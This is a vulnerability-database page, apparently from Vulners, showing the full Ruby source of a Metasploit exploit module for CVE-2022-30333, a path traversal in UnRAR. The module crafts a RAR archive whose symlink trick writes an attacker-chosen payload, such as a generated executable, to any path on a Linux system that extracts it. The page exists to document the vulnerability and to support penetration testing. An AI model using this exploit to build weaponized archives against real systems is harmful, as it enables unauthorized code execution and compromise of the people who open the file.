Lucene search
K

UnRAR Path Traversal (CVE-2022-30333)

🗓️ 29 Aug 2022 18:02:22Reported by Simon Scannell, Ron BowesType 
metasploit
 metasploit
🔗 www.rapid7.com👁 191 Views

UnRAR CVE-2022-30333 path-traversal vulnerabilit

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::Format::RarSymlinkPathTraversal

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',
        'Description' => %q{
          This module creates a RAR file that exploits CVE-2022-30333, which is a
          path-traversal vulnerability in unRAR that can extract an arbitrary file
          to an arbitrary location on a Linux system. UnRAR fixed this
          vulnerability in version 6.12 (open source version 6.1.7).

          The core issue is that when a symbolic link is unRAR'ed, Windows
          symbolic links are not properly validated on Linux systems and can
          therefore write a symbolic link that points anywhere on the filesystem.
          If a second file in the archive has the same name, it will be written
          to the symbolic link path.
        },
        'Author' => [
          'Simon Scannell', # Discovery / initial disclosure (via Sonar)
          'Ron Bowes', # Analysis, PoC, and module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-30333'],
          ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],
          ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],
          ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],
        ],
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Generic RAR file', {} ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2022-06-28',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
        OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),
        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../" - as well as a filename).']),
        OptString.new('SYMLINK_FILENAME', [ true, 'The name of the symlink file to use (must be 12 characters or less; default: random)', Rex::Text.rand_text_alpha_lower(4..12)])
      ]
    )
  end

  def exploit
    print_status("Target filename: #{datastore['TARGET_PATH']}")

    if datastore['CUSTOM_PAYLOAD'].present?
      print_status("Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}")
      payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])

      # Append a newline + NUL byte, since random data will be appended and we
      # don't want to break shellscripts
      payload_data.concat("\n\0")
    else
      print_status('Encoding configured payload')
      payload_data = generate_payload_exe
    end

    begin
      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'], datastore['TARGET_PATH'], payload_data)
    rescue StandardError => e
      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")
    end

    file_create(rar)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 May 2026 18:58Current
8.3High risk
Vulners AI Score8.3
CVSS 25
CVSS 3.17.5
EPSS0.98975
SSVC
191